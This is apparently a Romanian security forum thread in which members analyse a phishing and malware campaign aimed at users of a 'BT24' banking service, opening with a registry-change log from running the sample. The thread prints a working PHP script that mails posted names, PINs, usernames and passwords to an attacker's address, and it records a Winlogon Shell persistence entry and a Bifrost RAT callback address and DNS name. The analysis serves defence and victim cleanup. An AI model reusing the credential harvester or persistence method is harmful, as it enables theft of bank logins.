Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printKeepPrintedJobs	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printSeparatorFile	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printShareName	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printSpooling	PrintWhileSpooling
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printStartTime	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printerName	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\priority	1
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\serverName	tdx-f66aad8b5aa
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\shortServerName	TDX-F66AAD8B5AA
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\uNCName	\\tdx-f66aad8b5aa\Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\versionNumber	4
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Location	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Name	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\ObjectGUID	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Parameters	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Port	XPSPort:
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Print Processor	WinPrint
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Printer Driver	Microsoft XPS Document Writer
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\FeatureKeyword	BINARY SIZE=2 MD5=C4103F122D27677C9DB144CAE1394A66
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\FeatureKeywordSize	2
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\Forms?	1928778442
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\InitDriverVersion	1536
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\Model	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\PrinterData	BINARY SIZE=560 MD5=5FB20305A4C8E1AD8D66FD7E37635F2B
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\PrinterDriverData\PrinterDataSize	560
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Priority	1
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Security	BINARY SIZE=296 MD5=EDE42992E3DB259C8A86D09BD50BECAC
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Separator File	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Share Name	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\SpoolDirectory	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\StartTime	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Status	128
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\UntilTime	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\dnsTimeout	15000
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\txTimeout	45000
Reg Val	Changed	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU	"BINARY SIZE=16 MD5=550E494259E68F9603C0FE07F980E70A"	(old value="BINARY SIZE=16 MD5=9C9E0BB1A9F364BDB4CDF118969A58CF")
Reg Val	Changed	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Nqzvavfgengbe\Qrfxgbc\FlfgrzRkcybere.rkr	"BINARY SIZE=16 MD5=3DC276E175808868AA64F536B191C23D"	(old value="BINARY SIZE=16 MD5=3FC172AEE3B4D3BBC719B443C1DABF4A")
Reg Val	Changed	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG	"BINARY SIZE=16 MD5=11AFA458E635DEBA46531A1C99EF2181"	(old value="BINARY SIZE=16 MD5=7026A6639D6AD5BE21DD2A3FEE0CBBD7")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationCore, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\ImageList	"BINARY SIZE=2530 MD5=DA7AFF9DB0DC3478F0C33B9E7B8101C8"	(old value="BINARY SIZE=2514 MD5=A8DBF25B79426BF0B2A7496BAED06DC0")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\Status	"3"	(old value="2")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed	"BINARY SIZE=80 MD5=0ABF1D074E505CE9E52F8BD027337E03"	(old value="BINARY SIZE=80 MD5=DAD86B2FE383EA7978D57922BD8A402D")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\ILUsageMask	"BINARY SIZE=2 MD5=B08B7C15585E653ED9D7F4A0A186496F"	(old value="BINARY SIZE=2 MD5=FB73C139137BCCFEE5D95BDDB087480A")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex	"95"	(old value="94")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NIUsageMask	"BINARY SIZE=1 MD5=31741635B41D535098241FEA03C1E47F"	(old value="BINARY SIZE=1 MD5=8C493A43D8C1EF798860BB02B62E8E79")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh	"0"	(old value="1")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\WINDOWS\System32\Drivers\HTTP.sys[UlMofResource]	"LowDateTime:740033152,HighDateTime:30036388***Binary mof compiled successfully"	(old value="LowDateTime:560696064,HighDateTime:29883216***Binary mof compiled successfully")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\WBEM\WDM\C:\WINDOWS\System32\Drivers\HTTP.sys[UlMofResource]	"LowDateTime:740033152,HighDateTime:30036388***Binary mof compiled successfully"	(old value="LowDateTime:560696064,HighDateTime:29883216***Binary mof compiled successfully")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Counter	"4088"	(old value="4074")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Help	"4089"	(old value="4075")
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	"Explorer.exe ,C:\WINDOWS\system32\efoqj.exe"	(old value="Explorer.exe")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Counter	"4076"	(old value="3424")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Help	"4077"	(old value="3425")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter	"4088"	(old value="3436")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Help	"4089"	(old value="3437")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Object List	"4076 4082"	(old value="3424 3430")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count	"0"	(old value="1")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance	"0"	(old value="1")
Reg Key	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d
Reg Val	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\ILUsageMask	BINARY SIZE=1 MD5=00594FD4F42BA43FC1CA0427A0576295
Reg Val	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\NIUsageMask	BINARY SIZE=1 MD5=EC2D11028766E06AC33648E2F0A67320
Reg Val	Deleted	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0	SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}

ROFL Newbie

ROFL

Posted
Posted

Ce am gasit pe pagina specificata de tdxev hxxp://profilexx.haos.ro:

Un fisier numit <gohi.php> care contine:


<?php

        $val=$_POST['nume']."  ".$_POST['PIN']."  ".$_POST['comp']."  ".$_POST['oras']."  ".$_POST['reg']."  ".$_POST['user']."  ".$_POST['pass'];


$to = "[COLOR="Red"]alinuzza235@yahoo.com[/COLOR]";
$subject ="From ip: ".getenv("REMOTE_ADDR");
$email ="fraier@tds.com" ;
$message =$val;
$headers = "From: $email";
$sent = mail($to, $subject, $message, $headers) ;
if($sent)
{
print "Accesati din nou aplicatia BT24 pentru autentificare.";
 }
else
{print "ERROR"; }


?>

Probabil trimite serverul un request la asta si primeste el log-urile la adresa <alinuzza235@yahoo.com>.

Mai gasim pe acolo:

hxxp://profilexx.haos.ro/server.exe

hxxp://profilexx.haos.ro/profile.php

hxxp://profilexx.haos.ro/index.htm(identic cu profile.php)

Gugulica Newbie

Gugulica

Posted
Posted

Din dll-urile mentionate de Nytro am doar MSIMTF.DLL . Am facut setarile la Folder Options , tot nu-mi apare nici o iconita de Internet Explorer. Nod32 nu mi-a depistat nimic.Totusi eu am vizitat site-ul ala de vreo 2 ori.

tdxev Newbie

tdxev

Posted
Posted
Din dll-urile mentionate de Nytro am doar MSIMTF.DLL . Am facut setarile la Folder Options , tot nu-mi apare nici o iconita de Internet Explorer. Nod32 nu mi-a depistat nimic.Totusi eu am vizitat site-ul ala de vreo 2 ori.

Trebuie sa descarci si sa rulezi fisierul de acolo, altfel nu are ce sa se intample.

Fisierul gasit de ROFL la adresa "hxxp://profilexx.haos.ro/server.exe" l-am rulat si pare a fi un server de Bifrost incearca sa se conecteze la adresa 79.117.170.57:81 ip este de RDS ,nu a raspuns la ping foloseste DNS si probabil a schimbat ip-ul intretimp.

DNS folosit : "pariuri.no-ip.biz"

Sa-l studieze cineva care se pricepe mai bine.

http://profiles.yahoo.com/alinuzza235 => Alina - Member Since: 01/22/2010

Nu ar strica putin XSS pe adesa aia de mail... desi nu cred ca aveti mari sanse..se pricepe omul.

FlaVirus Newbie

FlaVirus

Posted
Posted (edited)

Si eu am luat virusul asta .

I-am dat o scanare cu nod32, a aparut un virus infectat in adobe shockwave care dupa scanare la sters , l-am cautat acum in log-uri dar nu l-am gasit .

Am cautat in system32 iconite cu IE insa nu am gasit nici una .

Am scanat aceste fisiere cu virustotal , numai yahooauth2.dll fiind infectat , nod32 l-a gasit curat .

C:\WINDOWS\system32\YahooAuth2.dll

C:\WINDOWS\system32\libeay32.dll

C:\WINDOWS\system32\ssleay32.dll

C:\WINDOWS\system32\tqsbsf.exe

Cum pot afla daca mai sunt infectat ?

later :

Aici veti gasi mai multe informatii referitoare la eliminarea virusului , eu am folosit prima metoda si pot sa spun ca momentan virusul nu mai este .

Edited by FlaVirus

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...